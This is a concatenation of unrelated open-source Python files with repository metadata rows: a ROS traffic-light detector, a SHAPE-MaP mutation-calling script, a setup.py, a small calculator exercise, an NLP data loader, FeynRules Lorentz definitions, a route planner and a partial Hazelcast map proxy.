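    # Standalone sketch (not part of the node) of the KDTree lookup used above,
    # with made-up waypoint coordinates, to show what query() returns:
    #
    #     from scipy.spatial import KDTree
    #     tree = KDTree([[0.0, 0.0], [10.0, 0.0], [20.0, 5.0]])
    #     dist, idx = tree.query([9.0, 1.0], 1)  # idx == 1, the nearest waypoint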
def get_light_state(self, light):
"""Determines the current color of the traffic light
Args:
light (TrafficLight): light to classify
Returns:
int: ID of traffic light color (specified in styx_msgs/TrafficLight)
"""
if(not self.has_image):
self.prev_light_loc = None
return False
# cv_image = self.bridge.imgmsg_to_cv2(self.camera_image, "bgr8")
cv_image = self.bridge.imgmsg_to_cv2(self.camera_image, "rgb8")
#Get classification
return self.light_classifier.get_classification(cv_image)
def process_traffic_lights(self):
"""Finds closest visible traffic light, if one exists, and determines its
location and color
Returns:
            int: index of waypoint closest to the upcoming stop line for a traffic light (-1 if none exists)
int: ID of traffic light color (specified in styx_msgs/TrafficLight)
"""
# light = None
closest_light = None
line_wp_idx = None
# List of positions that correspond to the line to stop in front of for a given intersection
stop_line_positions = self.config['stop_line_positions']
if(self.pose):
# car_position = self.get_closest_waypoint(self.pose.pose)
car_wp_idx = self.get_closest_waypoint(self.pose.pose.position.x, self.pose.pose.position.y)
#TODO find the closest visible traffic light (if one exists)
diff = len(self.waypoints.waypoints)
for i, light in enumerate(self.lights):
line = stop_line_positions[i]
temp_wp_idx = self.get_closest_waypoint(line[0], line[1])
d = temp_wp_idx - car_wp_idx
if d >=0 and d < diff:
diff = d
closest_light = light
line_wp_idx = temp_wp_idx
if closest_light:
state = self.get_light_state(closest_light)
return line_wp_idx, state
# self.waypoints = None
return -1, TrafficLight.UNKNOWN
if __name__ == '__main__':
try:
TLDetector()
except rospy.ROSInterruptException:
rospy.logerr('Could not start traffic node.')
| 34.78022 | 132 | 0.646445 |
501bea0132eb447a696bd18bf9755ba4442090c0 | 7,734 | py | Python | Figure_S1/Figure S1i-Compare with DMS-MaPseq/2-callMutations.py | zhangqf-lab/RIP-icSHAPE-MaP | 435cc8c8d5c2a662edb6371fd228174b3edd996f | ["MIT"] | 3 | 2021-06-11T14:17:04.000Z | 2021-12-20T16:20:20.000Z | Figure_S1/Figure S1i-Compare with DMS-MaPseq/2-callMutations.py | zhangqf-lab/RIP-icSHAPE-MaP | 435cc8c8d5c2a662edb6371fd228174b3edd996f | ["MIT"] | null | null | null | Figure_S1/Figure S1i-Compare with DMS-MaPseq/2-callMutations.py | zhangqf-lab/RIP-icSHAPE-MaP | 435cc8c8d5c2a662edb6371fd228174b3edd996f | ["MIT"] | null | null | null |
##### Run lpd lpdir envpy3 first
import subprocess
import threading
import os
def get_pairs():
pairs = []
pairs.append( [ 'NAI_100mm_vivo_CIRL_SSII', 'DMSO_CIRL_SSII', 'DC_CIRL_SSII' ] )
pairs.append( [ 'NAI_100mm_vitro_CIRL_SSII', 'DMSO_CIRL_SSII', 'DC_CIRL_SSII' ] )
pairs.append( [ 'NAI_100mm_vivo_SMR_SSII_repX', 'DMSO_SMR_SSII_repX', 'DC_SMR_SSII_repX' ] )
pairs.append( [ 'NAI_100mm_vitro_SMR_SSII_repX', 'DMSO_SMR_SSII_repX', 'DC_SMR_SSII_repX' ] )
pairs.append( [ 'NAI_200mm_vitro_SMR_BENR_SSII', 'DMSO_SMR_BENR_SSII' ] )
pairs.append( [ 'NAI_100mm_vitro_SMR_CENR_SSII', 'DMSO_SMR_BENR_SSII' ] )
pairs.append( [ 'NAI_100mm_vitro_SMR_BENR_SSII', 'DMSO_SMR_BENR_SSII' ] )
pairs.append( [ 'NAI_50mm_exvivo_dicer_1_CIRL_CENR_SSII_repX', 'DMSO_dicer_1_CIRL_BENR_SSII_repX', 'DC_dicer_CIRL_CENR_SSII_repX' ] )
pairs.append( [ 'NAI_50mm_exvivo_dicer_2_CIRL_CENR_SSII_repX', 'DMSO_dicer_2_CIRL_BENR_SSII_repX', 'DC_dicer_CIRL_CENR_SSII_repX' ] )
pairs.append( [ 'NAI_100mm_vivo_CIRL_CENR_SSII_repX', 'DMSO_CIRL_BENR_SSII', 'DC_CIRL_CENR_SSII' ] )
pairs.append( [ 'NAI_100mm_vivo_CIRL_TGIII', 'DMSO_CIRL_TGIII', 'DC_CIRL_TGIII' ] )
pairs.append( [ 'NAI_100mm_vitro_CIRL_TGIII', 'DMSO_CIRL_TGIII', 'DC_CIRL_TGIII' ] )
pairs.append( [ 'NAI_100mm_vitro_CIRL_CENR_SSII_repX', 'DMSO_CIRL_BENR_SSII', 'DC_CIRL_CENR_SSII' ] )
pairs.append( [ 'NAI_100mm_vitro_SMR_TGIII', 'DMSO_SMR_TGIII' ] )
pairs.append( [ 'NAI_200mm_vitro_SMR_TGIII', 'DMSO_SMR_TGIII' ] )
opt = {}
for triplet in pairs:
opt[ triplet[0] ] = { 'DMSO':triplet[1], 'DC':None }
if len(triplet) == 3:
opt[ triplet[0] ][ 'DC' ] = triplet[2]
return opt
def format_pairs(file_list):
opt = get_pairs()
construct_pairs = []
NAI_samples = [ file for file in file_list if file.startswith("NAI") ]
for NAI_file in NAI_samples:
necfiles = opt[NAI_file]
if necfiles['DMSO'] in file_list:
if necfiles['DC'] in file_list:
construct_pairs.append( [necfiles['DMSO'], NAI_file, necfiles['DC']] )
else:
construct_pairs.append( [necfiles['DMSO'], NAI_file] )
return construct_pairs
def load_fasta(seqFn, rem_tVersion=False):
Fasta = {}
cur_tid = ''
for line in open(seqFn):
if line[0] == '>':
cur_tid = line[1:].split()[0]
if rem_tVersion and '.' in cur_tid:
cur_tid = ".".join(cur_tid.split(".")[:-1])
Fasta[ cur_tid ] = ''
else:
Fasta[ cur_tid ] += line.strip()
return Fasta
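# Illustrative note (file name and ids made up): for a FASTA file containing
#     >rRNA_human_5S some description
#     GUCUACGGCCAUACCACC
# load_fasta() returns {'rRNA_human_5S': 'GUCUACGGCCAUACCACC'}; with
# rem_tVersion=True an id such as 'ENST00000361624.2' is stored as
# 'ENST00000361624'.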
class MakeReacProfClass(threading.Thread):
def __init__(self, inDir, outDir, seqFn, folderList, file_filter=None, mindepth=5000, maxbg=0.05, steps_to_run=[1,2,3]):
threading.Thread.__init__(self)
self.inDir = inDir
self.outDir = outDir
self.seqFn = seqFn
self.folderList = folderList[:]
        self.file_filter = set(file_filter) if file_filter else set()
self.mindepth = mindepth
self.maxbg = maxbg
self.steps_to_run = steps_to_run[:]
def run(self):
inDir = self.inDir.rstrip('/') + '/'
outDir = self.outDir.rstrip('/') + '/'
sequence = load_fasta(self.seqFn)
cmd1 = "shapemapper_mutation_counter -i %s -s -c %s -n %s 2>/dev/null 1>/dev/null"
cmd2 = "make_reactivity_profiles.py --fa %s --rna %s --counts %s --out %s --mindepth %s --maxbg %s 2>/dev/null 1>/dev/null"
cmd3 = "normalize_profiles.py --disable-end3 --tonorm %s 1>/dev/null"
#inputFolders = os.listdir(inDir)
for folder_name in self.folderList:
print("Run "+folder_name)
rna_name = folder_name
tLen = len(sequence[rna_name])
oFolder = outDir + folder_name
if not os.path.isdir(inDir+folder_name):
continue
if not os.path.exists(oFolder):
os.mkdir(oFolder)
inputFiles = os.listdir(inDir+folder_name)
if self.file_filter:
inputFiles = set(inputFiles) & self.file_filter
if 1 in self.steps_to_run:
for iFile in inputFiles:
inFile_full = inDir+folder_name+"/"+iFile
outFile_full = oFolder + "/" + iFile
command = cmd1 % (inFile_full, outFile_full, tLen)
output = subprocess.getoutput(command)
if 2 in self.steps_to_run or 3 in self.steps_to_run:
con_pairs = format_pairs(inputFiles)
for pair in con_pairs:
dmso_full = oFolder + "/" + pair[0]
nai_full = oFolder + "/" + pair[1]
#if len(pair) == 3:
# dc_full = oFolder + "/" + pair[2]
#else:
# dc_full = ""
dc_full = ""
outSHAPEfull = oFolder + "/" + pair[1] + ".shape"
if 2 in self.steps_to_run:
command = cmd2 % (seqFn, rna_name, nai_full+" "+dmso_full+" "+dc_full, outSHAPEfull, self.mindepth, self.maxbg)
output = subprocess.getoutput(command)
if 3 in self.steps_to_run:
command = cmd3 % (outSHAPEfull, )
output = subprocess.getoutput(command)
if "NormError" in output:
print("==>filter "+outSHAPEfull)
os.remove(outSHAPEfull)
else:
print("==>Success "+outSHAPEfull)
def batch_collect_mutations(inDir, outDir, seqFn, nproc=1, file_filter=None, mindepth=5000, maxbg=0.05, steps_to_run=[1,2,3]):
import subprocess, math
import _thread
import time
import random
inputFolders = os.listdir(inDir)
random.shuffle(inputFolders)
if 'rRNA_human_5S' in inputFolders:
inputFolders.remove('rRNA_human_5S')
inputFolders.insert(0, 'rRNA_human_5S')
if 'error' in inputFolders:
inputFolders.remove('error')
N_forEachProc = math.ceil(len(inputFolders) / nproc)
print("Number for each process: "+str(N_forEachProc))
Folders_Lists = []
i = 0
while i < len(inputFolders):
Folders_Lists.append( inputFolders[i:i+N_forEachProc] )
i += N_forEachProc
thred_list = []
for folder_list in Folders_Lists:
thread = MakeReacProfClass(inDir, outDir, seqFn, folder_list, file_filter, mindepth, maxbg, steps_to_run)
thred_list.append( thread )
print("Number of threads list: "+str(len(thred_list)))
for thread in thred_list:
thread.start()
for thread in thred_list:
thread.join()
inDir = "/Share/home/zhangqf7/lipan/precursor_SHAPEMAP/test/dms-mapseq-rep/5.split_mutation"
outDir = "/Share/home/zhangqf7/lipan/precursor_SHAPEMAP/test/dms-mapseq-rep/6.shapemapper"
seqFn = "/Share/home/zhangqf7/lipan/precursor_SHAPEMAP/test/dms-mapseq-rep/ref/yeast.uniq.fa"
file_filter = ['REP1', 'REP2']
batch_collect_mutations(inDir, outDir, seqFn, nproc=20, file_filter=file_filter, mindepth=1000, maxbg=0.05, steps_to_run=[1])
| 44.194286 | 142 | 0.569822 |
f5b1e7289f9bfbeac72dd18eb335bde902363ab9 | 1,756 | py | Python | setup.py | MrRutledge/pypastry | 59104ee8e882e75d33fe7bab60f03c353516eb8a | ["MIT"] | 1 | 2019-11-13T11:12:18.000Z | 2019-11-13T11:12:18.000Z | setup.py | MrRutledge/pypastry | 59104ee8e882e75d33fe7bab60f03c353516eb8a | ["MIT"] | null | null | null | setup.py | MrRutledge/pypastry | 59104ee8e882e75d33fe7bab60f03c353516eb8a | ["MIT"] | null | null | null |
import sys
from setuptools import setup, find_packages
#check to make sure the python version is compatible
if sys.version_info < (3, 6):
sys.exit('Sorry, PyPastry requires Python version 3.6 or greater')
# Reading in the ReadMe file as the doc file
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name='pypastry',
version='0.2.1',
description='PyPastry machine learning experimentation framework',
author='Daoud Clarke',
url='https://github.com/datapastry/pypastry',
scripts=['pastry'],
install_requires=['tomlkit', 'pandas', 'scikit-learn', 'pyarrow', 'gitpython', 'pytest'],
#To find the packages
packages=find_packages(),
#To read in data file modules
py_modules=['data/pie'],
# commands that can be run in a console in the commands folder
entry_points={
'console_scripts': [
'init = pypastry.commands.init:run',
'print = pypastry.commands.print_:run',
'run = pypastry.commands.run:run'
]},
package_data={
'' : ['data/*.gitignore'],
# And include any *.gitignore files found in the 'data' package, too:
'data': ['*.gitignore'],
},
long_description=long_description,
long_description_content_type='text/markdown',
# Make the setup file aware of the Manifest file
include_package_data=True,
    #Minimum requirement of python, license, and operating system.
classifiers=[
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"],
python_requires='>=3.5',
)
| 33.769231 | 93 | 0.6418 |
6e766104bdac6ddc8195ddbc96f49804fd7c3a2e | 751 | py | Python | Mundo 2/ex059.py | sandenbergmelo/ExerciciosPython | 049958801823b1b9b23b0e80f6f1bcf8cd272efe | ["MIT"] | 1 | 2021-05-12T18:44:11.000Z | 2021-05-12T18:44:11.000Z | Mundo 2/ex059.py | sandenbergmelo/ExerciciosPython | 049958801823b1b9b23b0e80f6f1bcf8cd272efe | ["MIT"] | null | null | null | Mundo 2/ex059.py | sandenbergmelo/ExerciciosPython | 049958801823b1b9b23b0e80f6f1bcf8cd272efe | ["MIT"] | null | null | null |
n1 = int(input('Primeiro valor: '))
n2 = int(input('Segundo valor: '))
opcao = 0
while opcao != 5:
print(''' [ 1 ] Somar
[ 2 ] Multiplicar
[ 3 ] Maior
[ 4 ] Novos números
[ 5 ] Sair do programa''')
opcao = int(input('Opção: '))
if opcao == 1:
soma = n1 + n2
print(f'\n\n{n1} + {n2} = {soma}\n\n')
elif opcao == 2:
produto = n1 * n2
print(f'\n\n{n1} x {n2} = {produto}\n\n')
elif opcao == 3:
maior = max(n1, n2)
menor = min(n1, n2)
print(f'\n\n{maior} é maior que {menor}\n\n')
elif opcao == 4:
print('Novos números: ')
n1 = int(input('Primeiro valor: '))
n2 = int(input('Segundo valor: '))
elif opcao == 5:
print('Fim do programa')
else:
print('Opção inválida')
print('=-=' * 10)
else:
print('Fim do programa')
| 22.088235 | 47 | 0.569907 |
cdbbee64d37a04d2ec606caad18f1e913aaa5736 | 4,628 | py | Python | vdpwi/data.py | achyudh/castor | d7a02ce03f2b71ef1fa490122dd4bbc8214b8b19 | ["Apache-2.0"] | 132 | 2017-04-02T12:31:55.000Z | 2019-03-09T07:53:29.000Z | vdpwi/data.py | sudipta90/castor | fa2f59535c71a0fb4586afbe543b81ba812c8630 | ["Apache-2.0"] | 111 | 2017-04-01T23:00:24.000Z | 2019-03-10T08:29:20.000Z | vdpwi/data.py | sudipta90/castor | fa2f59535c71a0fb4586afbe543b81ba812c8630 | ["Apache-2.0"] | 53 | 2017-04-06T01:17:18.000Z | 2019-02-27T03:10:35.000Z |
import argparse
import os
import torch
import torch.nn as nn
import torch.utils.data as data
class Configs(object):
@staticmethod
def base_config():
parser = argparse.ArgumentParser()
parser.add_argument("--classifier", type=str, default="vdpwi", choices=["vdpwi", "resnet"])
parser.add_argument("--clip_norm", type=float, default=50)
parser.add_argument("--cpu", action="store_true", default=False)
parser.add_argument("--dataset", type=str, default="sick", choices=["sick"])
parser.add_argument("--decay", type=float, default=0.95)
parser.add_argument("--input_file", type=str, default="local_saves/model.pt")
parser.add_argument("--lr", type=float, default=5E-4)
parser.add_argument("--mbatch_size", type=int, default=16)
parser.add_argument("--mode", type=str, default="train", choices=["train", "test"])
parser.add_argument("--momentum", type=float, default=0.1)
parser.add_argument("--n_epochs", type=int, default=35)
parser.add_argument("--n_labels", type=int, default=5)
parser.add_argument("--optimizer", type=str, default="rmsprop", choices=["adam", "sgd", "rmsprop"])
parser.add_argument("--output_file", type=str, default="local_saves/model.pt")
parser.add_argument("--res_fmaps", type=int, default=32)
parser.add_argument("--res_layers", type=int, default=16)
parser.add_argument("--restore", action="store_true", default=False)
parser.add_argument("--rnn_hidden_dim", type=int, default=250)
parser.add_argument("--weight_decay", type=float, default=1E-5)
parser.add_argument("--wordvecs_file", type=str, default="local_data/glove/glove.840B.300d.txt")
return parser.parse_known_args()[0]
@staticmethod
def sick_config():
parser = argparse.ArgumentParser()
parser.add_argument("--n_labels", type=int, default=5)
parser.add_argument("--sick_cache", type=str, default="local_data/sick/.vec-cache")
parser.add_argument("--sick_data", type=str, default="local_data/sick")
return parser.parse_known_args()[0]
class LabeledEmbeddedDataset(data.Dataset):
def __init__(self, sentence_indices1, sentence_indices2, labels, compare_labels=None):
assert len(sentence_indices1) == len(labels) == len(sentence_indices2)
self.sentence_indices1 = sentence_indices1
self.sentence_indices2 = sentence_indices2
self.labels = labels
self.compare_labels = compare_labels
def __getitem__(self, idx):
cmp_lbl = None if self.compare_labels is None else self.compare_labels[idx]
return self.sentence_indices1[idx], self.sentence_indices2[idx], self.labels[idx], cmp_lbl
def __len__(self):
return len(self.labels)
def load_sick():
config = Configs.sick_config()
def fetch_indices(name):
sentence_indices = []
filename = os.path.join(config.sick_data, dataset, name)
with open(filename) as f:
for line in f:
indices = [embed_ids.get(word, -1) for word in line.strip().split()]
indices = list(filter(lambda x: x >= 0, indices))
sentence_indices.append(indices)
return sentence_indices
def read_labels(filename):
labels = []
with open(filename) as f:
for line in f:
labels.append([float(val) for val in line.split()])
return labels
sets = []
embeddings = []
embed_ids = {}
with open(os.path.join(config.sick_cache)) as f:
for i, line in enumerate(f):
word, vec = line.split(" ", 1)
vec = list(map(float, vec.strip().split()))
embed_ids[word] = i
embeddings.append(vec)
padding_idx = len(embeddings)
embeddings.append([0.0] * 300)
for dataset in ("train", "dev", "test"):
sparse_filename = os.path.join(config.sick_data, dataset, "sim_sparse.txt")
truth_filename = os.path.join(config.sick_data, dataset, "sim.txt")
sparse_labels = read_labels(sparse_filename)
cmp_labels = read_labels(truth_filename)
indices1 = fetch_indices("a.toks")
indices2 = fetch_indices("b.toks")
sets.append(LabeledEmbeddedDataset(indices1, indices2, sparse_labels, cmp_labels))
embedding = nn.Embedding(len(embeddings), 300)
embedding.weight.data.copy_(torch.Tensor(embeddings))
embedding.weight.requires_grad = False
return embedding, sets
def load_dataset(dataset):
return _loaders[dataset]()
_loaders = dict(sick=load_sick)
| 42.072727 | 107 | 0.658168 |
0c800b9a9b1539f81cc9f466ab49348cd7f2d73b | 2,989 | py | Python | mathematica/feynrules/KineticMixingDM_UFO/lorentz.py | LoganAMorrison/AsymptoticBoltzmann | ef0213a7acc3f8d7095b446716bc90bbb036493d | [
"MIT"
] | null | null | null | mathematica/feynrules/KineticMixingDM_UFO/lorentz.py | LoganAMorrison/AsymptoticBoltzmann | ef0213a7acc3f8d7095b446716bc90bbb036493d | [
"MIT"
] | null | null | null | mathematica/feynrules/KineticMixingDM_UFO/lorentz.py | LoganAMorrison/AsymptoticBoltzmann | ef0213a7acc3f8d7095b446716bc90bbb036493d | [
"MIT"
] | null | null | null | # This file was automatically created by FeynRules 2.3.36
# Mathematica version: 12.1.1 for Linux x86 (64-bit) (June 19, 2020)
# Date: Thu 13 Aug 2020 15:13:29
from object_library import all_lorentz, Lorentz
from function_library import complexconjugate, re, im, csc, sec, acsc, asec, cot
try:
import form_factors as ForFac
except ImportError:
pass
UUS1 = Lorentz(name = 'UUS1',
spins = [ -1, -1, 1 ],
structure = '1')
UUV1 = Lorentz(name = 'UUV1',
spins = [ -1, -1, 3 ],
structure = 'P(3,2) + P(3,3)')
SSS1 = Lorentz(name = 'SSS1',
spins = [ 1, 1, 1 ],
structure = '1')
FFS1 = Lorentz(name = 'FFS1',
spins = [ 2, 2, 1 ],
structure = 'ProjM(2,1)')
FFS2 = Lorentz(name = 'FFS2',
spins = [ 2, 2, 1 ],
structure = 'ProjM(2,1) - ProjP(2,1)')
FFS3 = Lorentz(name = 'FFS3',
spins = [ 2, 2, 1 ],
structure = 'ProjP(2,1)')
FFS4 = Lorentz(name = 'FFS4',
spins = [ 2, 2, 1 ],
structure = 'ProjM(2,1) + ProjP(2,1)')
FFV1 = Lorentz(name = 'FFV1',
spins = [ 2, 2, 3 ],
structure = 'Gamma(3,2,1)')
FFV2 = Lorentz(name = 'FFV2',
spins = [ 2, 2, 3 ],
structure = 'Gamma(3,2,-1)*ProjM(-1,1)')
FFV3 = Lorentz(name = 'FFV3',
spins = [ 2, 2, 3 ],
structure = 'Gamma(3,2,-1)*ProjP(-1,1)')
VSS1 = Lorentz(name = 'VSS1',
spins = [ 3, 1, 1 ],
structure = 'P(1,2) - P(1,3)')
VVS1 = Lorentz(name = 'VVS1',
spins = [ 3, 3, 1 ],
structure = 'Metric(1,2)')
VVV1 = Lorentz(name = 'VVV1',
spins = [ 3, 3, 3 ],
structure = 'P(3,1)*Metric(1,2) - P(3,2)*Metric(1,2) - P(2,1)*Metric(1,3) + P(2,3)*Metric(1,3) + P(1,2)*Metric(2,3) - P(1,3)*Metric(2,3)')
SSSS1 = Lorentz(name = 'SSSS1',
spins = [ 1, 1, 1, 1 ],
structure = '1')
VVSS1 = Lorentz(name = 'VVSS1',
spins = [ 3, 3, 1, 1 ],
structure = 'Metric(1,2)')
VVVV1 = Lorentz(name = 'VVVV1',
spins = [ 3, 3, 3, 3 ],
structure = 'Metric(1,4)*Metric(2,3) - Metric(1,3)*Metric(2,4)')
VVVV2 = Lorentz(name = 'VVVV2',
spins = [ 3, 3, 3, 3 ],
structure = 'Metric(1,4)*Metric(2,3) + Metric(1,3)*Metric(2,4) - 2*Metric(1,2)*Metric(3,4)')
VVVV3 = Lorentz(name = 'VVVV3',
spins = [ 3, 3, 3, 3 ],
structure = 'Metric(1,4)*Metric(2,3) - Metric(1,2)*Metric(3,4)')
VVVV4 = Lorentz(name = 'VVVV4',
spins = [ 3, 3, 3, 3 ],
structure = 'Metric(1,3)*Metric(2,4) - Metric(1,2)*Metric(3,4)')
VVVV5 = Lorentz(name = 'VVVV5',
spins = [ 3, 3, 3, 3 ],
structure = 'Metric(1,4)*Metric(2,3) - (Metric(1,3)*Metric(2,4))/2. - (Metric(1,2)*Metric(3,4))/2.')
| 31.463158 | 153 | 0.463031 |
ef2d9ce79e6bc0c87b840a6ce8204bae1ce5e0ef | 430 | py | Python | output/models/nist_data/atomic/ncname/schema_instance/nistschema_sv_iv_atomic_ncname_length_1_xsd/nistschema_sv_iv_atomic_ncname_length_1.py | tefra/xsdata-w3c-tests | b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f | [
"MIT"
] | 1 | 2021-08-14T17:59:21.000Z | 2021-08-14T17:59:21.000Z | output/models/nist_data/atomic/ncname/schema_instance/nistschema_sv_iv_atomic_ncname_length_1_xsd/nistschema_sv_iv_atomic_ncname_length_1.py | tefra/xsdata-w3c-tests | b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f | [
"MIT"
] | 4 | 2020-02-12T21:30:44.000Z | 2020-04-15T20:06:46.000Z | output/models/nist_data/atomic/ncname/schema_instance/nistschema_sv_iv_atomic_ncname_length_1_xsd/nistschema_sv_iv_atomic_ncname_length_1.py | tefra/xsdata-w3c-tests | b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f | [
"MIT"
] | null | null | null | from dataclasses import dataclass, field
__NAMESPACE__ = "NISTSchema-SV-IV-atomic-NCName-length-1-NS"
@dataclass
class NistschemaSvIvAtomicNcnameLength1:
class Meta:
name = "NISTSchema-SV-IV-atomic-NCName-length-1"
namespace = "NISTSchema-SV-IV-atomic-NCName-length-1-NS"
value: str = field(
default="",
metadata={
"required": True,
"length": 1,
}
)
| 22.631579 | 64 | 0.62093 |
5a52130a3fd85039c173d92ef0c13a0868635d7f | 1,593 | py | Python | smartcab/planner.py | thantuongaotrang/smart-cab | f5e34b15d01f6f15385318e5d09360cb1218b806 | [
"MIT"
] | null | null | null | smartcab/planner.py | thantuongaotrang/smart-cab | f5e34b15d01f6f15385318e5d09360cb1218b806 | [
"MIT"
] | null | null | null | smartcab/planner.py | thantuongaotrang/smart-cab | f5e34b15d01f6f15385318e5d09360cb1218b806 | [
"MIT"
] | null | null | null | import random
class RoutePlanner(object):
"""Silly route planner that is meant for a perpendicular grid network."""
def __init__(self, env, agent):
self.env = env
self.agent = agent
self.destination = None
def route_to(self, destination=None):
self.destination = destination if destination is not None else random.choice(self.env.intersections.keys())
print "RoutePlanner.route_to(): destination = {}".format(destination) # [debug]
def next_waypoint(self):
location = self.env.agent_states[self.agent]['location']
heading = self.env.agent_states[self.agent]['heading']
delta = (self.destination[0] - location[0], self.destination[1] - location[1])
if delta[0] == 0 and delta[1] == 0:
return None
elif delta[0] != 0: # EW difference
if delta[0] * heading[0] > 0: # facing correct EW direction
return 'forward'
elif delta[0] * heading[0] < 0: # facing opposite EW direction
return 'right' # long U-turn
elif delta[0] * heading[1] > 0:
return 'right'
else:
return 'left'
elif delta[1] != 0: # NS difference
if delta[1] * heading[1] > 0: # facing correct NS direction
return 'forward'
elif delta[1] * heading[1] < 0: # facing opposite NS direction
return 'right' # long U-turn
elif delta[1] * heading[0] > 0:
return 'right'
else:
return 'left'
| 40.846154 | 115 | 0.560578 |
3b9e5ed5d79c9462856e4e8a132ac963622f9889 | 33,643 | py | Python | hzclient/proxy/mapproxy.py | hazelcast-incubator/hazelcast-python-client | 5ec6c908916a6adef648059314923c0dbf71557b | [
"Apache-2.0"
] | null | null | null | hzclient/proxy/mapproxy.py | hazelcast-incubator/hazelcast-python-client | 5ec6c908916a6adef648059314923c0dbf71557b | [
"Apache-2.0"
] | null | null | null | hzclient/proxy/mapproxy.py | hazelcast-incubator/hazelcast-python-client | 5ec6c908916a6adef648059314923c0dbf71557b | [
"Apache-2.0"
] | null | null | null | __author__ = 'jonathanbrodie'
from hzclient.codec import mapcodec
from hzclient.codec import proxycodec
from hzclient.clientmessage import ClientMessage
from util import encode
class MapProxy(object):
def __init__(self,title,connfamily):
self.title=title
self.connection=connfamily
firstpack=proxycodec.createProxy(self.title, "hz:impl:mapService")
self.connection.sendPackage(firstpack)
response=self.connection.getPackageWithCorrelationId(firstpack.correlation,True)
newresponse=ClientMessage.decodeMessage(response)
if response is not None:
print "Initialized and connected proxy!"
else:
print "Unable to connect to server."
def AddEntryListener(self, includeValue, eventhandler):
msg=mapcodec.MapAddEntryListenerCodec.encodeRequest( encode.encodestring(self.title), encode.encodeboolean(includeValue))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg)
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
self.connection.eventregistry[correlationid]=mapcodec.MapAddEntryListenerCodec.EventHandler(eventhandler)
return mapcodec.MapAddEntryListenerCodec.decodeResponse(msg2).response
def AddEntryListenerToKey(self, key, includeValue, eventhandler):
msg=mapcodec.MapAddEntryListenerToKeyCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeboolean(includeValue))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
self.connection.eventregistry[correlationid]=mapcodec.MapAddEntryListenerToKeyCodec.EventHandler(eventhandler)
return mapcodec.MapAddEntryListenerToKeyCodec.decodeResponse(msg2).response
def AddEntryListenerToKeyWithPredicate(self, key, predicate, includeValue, eventhandler):
msg=mapcodec.MapAddEntryListenerToKeyWithPredicateCodec.encodeRequest( encode.encodestring(self.title), key, predicate, encode.encodeboolean(includeValue))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
self.connection.eventregistry[correlationid]=mapcodec.MapAddEntryListenerToKeyWithPredicateCodec.EventHandler(eventhandler)
return mapcodec.MapAddEntryListenerToKeyWithPredicateCodec.decodeResponse(msg2).response
def AddEntryListenerWithPredicate(self, predicate, includeValue, eventhandler):
msg=mapcodec.MapAddEntryListenerWithPredicateCodec.encodeRequest( encode.encodestring(self.title), predicate, encode.encodeboolean(includeValue))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
self.connection.eventregistry[correlationid]=mapcodec.MapAddEntryListenerWithPredicateCodec.EventHandler(eventhandler)
return mapcodec.MapAddEntryListenerWithPredicateCodec.decodeResponse(msg2).response
def AddIndex(self, attribute, ordered):
msg=mapcodec.MapAddIndexCodec.encodeRequest( encode.encodestring(self.title), encode.encodestring(attribute), encode.encodeboolean(ordered))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapAddIndexCodec.decodeResponse(msg2)
def AddInterceptor(self, interceptor):
msg=mapcodec.MapAddInterceptorCodec.encodeRequest( encode.encodestring(self.title), interceptor)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapAddInterceptorCodec.decodeResponse(msg2).response
def AddNearCacheEntryListener(self, includeValue, eventhandler):
msg=mapcodec.MapAddNearCacheEntryListenerCodec.encodeRequest( encode.encodestring(self.title), encode.encodeboolean(includeValue))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
self.connection.eventregistry[correlationid]=mapcodec.MapAddNearCacheEntryListenerCodec.EventHandler(eventhandler)
return mapcodec.MapAddNearCacheEntryListenerCodec.decodeResponse(msg2).response
def AddPartitionLostListener(self, eventhandler):
msg=mapcodec.MapAddPartitionLostListenerCodec.encodeRequest( encode.encodestring(self.title))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
self.connection.eventregistry[correlationid]=mapcodec.MapAddPartitionLostListenerCodec.EventHandler(eventhandler)
return mapcodec.MapAddPartitionLostListenerCodec.decodeResponse(msg2).response
def Clear(self, ):
msg=mapcodec.MapClearCodec.encodeRequest( encode.encodestring(self.title))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapClearCodec.decodeResponse(msg2)
def ContainsKey(self, key, threadId):
